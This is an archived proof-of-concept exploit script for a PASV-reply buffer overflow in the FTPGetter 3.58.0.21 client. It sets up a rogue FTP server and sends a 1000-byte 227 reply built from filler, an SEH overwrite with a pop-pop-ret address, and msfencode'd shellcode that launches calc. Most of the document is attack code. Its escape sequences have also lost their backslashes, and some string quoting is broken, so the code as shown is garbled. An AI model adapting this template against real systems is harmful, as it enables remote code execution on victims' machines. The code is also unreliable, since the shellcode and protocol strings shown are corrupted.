
# Title : FTPGetter v3.58.0.21 Buffer Overflow (PASV) Exploit
# Published : 2011-02-03
# Author : modpr0be


#!/usr/bin/python

# Exploit Title: FTPGetter v3.58.0.21 Buffer Overflow (PASV) Exploit
# Date: 02/03/2011
# Author: modpr0be
# Software Link: http://www.ftpgetter.com/ftpgetter_setup.exe
# Vulnerable version: <= 3.58.0.21
# Tested on: Windows XP SP3 (VMware Player 3.1.3 build-324285)
# CVE : N/A

# ======================================================================
#        ___       _ __        __            __    _     __
#   ____/ (_)___ _(_) /_____ _/ / ___  _____/ /_  (_)___/ /___  ____ _
#  / __  / / __ `/ / __/ __ `/ / / _ / ___/ __ / / __  / __ / __ `/
# / /_/ / / /_/ / / /_/ /_/ / / /  __/ /__/ / / / / /_/ / / / / /_/ /
# __,_/_/__, /_/__/__,_/_/  ___/___/_/ /_/_/__,_/_/ /_/__,_/
#        /____/                          http://www.digital-echidna.org
# ======================================================================
#
# Greetz:
#   say hello to all digital-echidna org crew:
#     otoy, cipherstring, bean, s3o, d00m, n0rf0x, fm, gotechidna, manix
#   special thx:
#     otoy, cipherstring, cyb3r.anbu, oebaj.
#   help for documentation:   	
#     offsec, exploit-db, corelan-team, 5M7X, loneferret.
#

#### Software description:
# Save time on FTP/SFTP updates! Plan your uploads and automate the workflow. 
# Schedule and automate file transfers with a centralized console. Let your 
# computer move or synchronize information securely between home and office 
# automatically according to the schedule!
#
#### Exploit information:
# There is an error in how the response to the PASV command is handled.
# Fortunately, this error leads to a buffer overflow.
# This exploit is unstable. It should only be used as a POC.
# I tried several times on various systems; the buffer sometimes changed.
# 
### Some Conditions:
# This POC is using "the most selling feature" Automated FTP Request.
# For this POC, I used Auto Download with / as the Source Files.
# Scheduler Settings also set to Repetitive.
# Make sure to run the program first before this POC.
# 
#### Other information:
# It's a part of "Death of an FTP Client" :)
# For more information, look here:
# http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/
#
##

from socket import *
import struct
import time

# Layout constants for the oversized string placed into the 227 (PASV) reply
# that hajar() sends. The script is Python 2 (print statements, str payloads).
# NOTE(review): this archived copy appears to have lost the backslashes from its
# escape sequences ("x41", "x90", ...); as written, these literals are plain
# ASCII text, so the byte counts below reflect the original escaped form only.
total = 1000                  # intended total length of the PASV payload string
junk1 = "x41" * 485           # leading filler
nseh = "xebx06x90x90"         # 4-byte slot named after the next-SEH field
seh = struct.pack('<L', 0x1001A149) # ppr from ssleay32.dll
nops = "x90" * 8              # 8-byte pad before the shellcode string

# msfpayload windows/exec CMD=calc R | msfencode -t c 
# [*] x86/shikata_ga_nai succeeded with size 223 (iteration=1)
# BadChars x00xffx0dx5cx2fx0a

# Encoded payload from the msfpayload/msfencode line in the comment above
# (223 bytes in escaped form); reproduced verbatim, never inspected or
# decoded by this script.
shellcode = (
"xdbxd1xd9x74x24xf4x5ax31xc9xb1x32xb8xcaxeaxc0"
"x1fx31x42x17x83xc2x04x03x88xf9x22xeaxf0x16x2b"
"x15x08xe7x4cx9fxedxd6x5exfbx66x4ax6fx8fx2ax67"
"x04xddxdexfcx68xcaxd1xb5xc7x2cxdcx46xe6xf0xb2"
"x85x68x8dxc8xd9x4axacx03x2cx8axe9x79xdfxdexa2"
"xf6x72xcfxc7x4ax4fxeex07xc1xefx88x22x15x9bx22"
"x2cx45x34x38x66x7dx3ex66x57x7cx93x74xabx37x98"
"x4fx5fxc6x48x9exa0xf9xb4x4dx9fx36x39x8fxe7xf0"
"xa2xfax13x03x5exfdxe7x7ex84x88xf5xd8x4fx2axde"
"xd9x9cxadx95xd5x69xb9xf2xf9x6cx6ex89x05xe4x91"
"x5ex8cxbexb5x7axd5x65xd7xdbxb3xc8xe8x3cx1bxb4"
"x4cx36x89xa1xf7x15xc7x34x75x20xaex37x85x2bx80"
"x5fxb4xa0x4fx27x49x63x34xd7x03x2ex1cx70xcaxba"
"x1dx1dxedx10x61x18x6ex91x19xdfx6exd0x1cx9bx28"
"x08x6cxb4xdcx2exc3xb5xf4x4cx82x25x94x92")

# Trailing pad sized so that the whole concatenation is exactly `total`
# characters long. If the pieces already exceed `total`, the multiplier is
# negative and junk2 is simply the empty string (Python str * negative -> "").
junk2 = "x90" * (total - len(junk1+nseh+seh+nops+shellcode))
# Final string that hajar() embeds in the 227 reply; it is assembled once here
# and read as a module global.
payload = junk1+nseh+seh+nops+shellcode+junk2

# This script does not connect to anything: it impersonates an FTP server and
# waits for the vulnerable *client* to connect to it. It binds every interface
# on TCP/21, which needs elevated privileges on most systems, so run it only on
# an isolated lab network.
host = "0.0.0.0"
port = 21

s = socket(AF_INET, SOCK_STREAM)
s.bind((host, port))
s.listen(1)   # backlog of one; exactly one client is serviced below

print "n[+] FTPGetter v3.58.0.21 Buffer Overflow POC"
print "[+] by modpr0be[at]digital-echidna[dot]org."
print "============================================="
print "[+] Evil FTP Server Started."
print "[+] Listening on %d ..." % port

# Blocks until the client connects. `cl` is the accepted control-channel
# socket; hajar() below reads it as a module global rather than a parameter.
cl, addr = s.accept()
print "[+] Connection accepted from %s" % addr[0]
print "[+] Whatever for username and password."

def hajar():
	"""Walk the connected client through a scripted FTP login, then answer
	its PASV with an oversized 227 reply.

	Uses the module-level socket ``cl`` and the module-level string
	``payload``. Every ``recv(1024)`` is a blind read whose content is
	discarded, so the replies are matched to client commands purely by
	order (the expected command is noted beside each send); a client that
	issues commands in a different order desynchronises the exchange.

	A conforming 227 reply carries six small decimal fields
	(h1,h2,h3,h4,p1,p2). The one sent here prefixes ``payload`` to those
	fields, producing a reply line far longer than any client should have
	to buffer. From a defensive standpoint that length is the tell: a 227
	line of ~1000 characters from a server is anomalous and is what a
	client-side bounds check (or a proxy/IDS rule on FTP control traffic)
	should reject.

	NOTE(review): in this archived copy the unescaped quotes around / in
	the two 257 replies terminate the literal early as written.
	"""
	welcome = "220 Welcome to EvilFTP Serverrn"
	cl.send(welcome)
	cl.recv(1024)
	cl.send("331 User name okay, need passwordrn")	# received USER
	cl.recv(1024)
	cl.send("230-Password acceptedrn")		# received PASS
	cl.send("230 User logged in.rn")
	cl.recv(1024)
	cl.send("215 UNIX Type: L8rn")   # received from SYST
	cl.recv(1024)
	cl.send("200 Type set to Irn")	# received from TYPE I
	cl.recv(1024)
	cl.send("200 OKrn")			# received from REST 0
	cl.recv(1024)
	cl.send("200 Command not Understoodrn")	# received from OPTS UTF8 OFF
	cl.recv(1024)
	cl.send("257 "/" is current directoryrn")	# received from PWD
	cl.recv(1024)
	cl.send("250 CWD Command successful.rn")
	cl.recv(1024)
	cl.send("257 "/" is current directoryrn")	# received from PWD
	cl.recv(1024)
	cl.send("200 Type set to Irn")	# received from TYPE I
	cl.recv(1024)
	print "[+] Begin sending evil passive mode.."
	# The malformed reply: `payload` is spliced in front of the six numeric
	# fields a normal 227 line would carry.
	cl.send("227 Entering Passive Mode ("+payload+",1,1,1,1,1)rn")	# this is the junk from passive mode
	cl.recv(1024)
	cl.close() 

# Service the single accepted connection, then tear down the listener. There
# is no accept loop: a second client would have to restart the script. The
# sleep only delays the final message; nothing is checked on the client side.
hajar()
time.sleep(3)
print "[+] Skadush! Calculator will pop out..rn" 

s.close()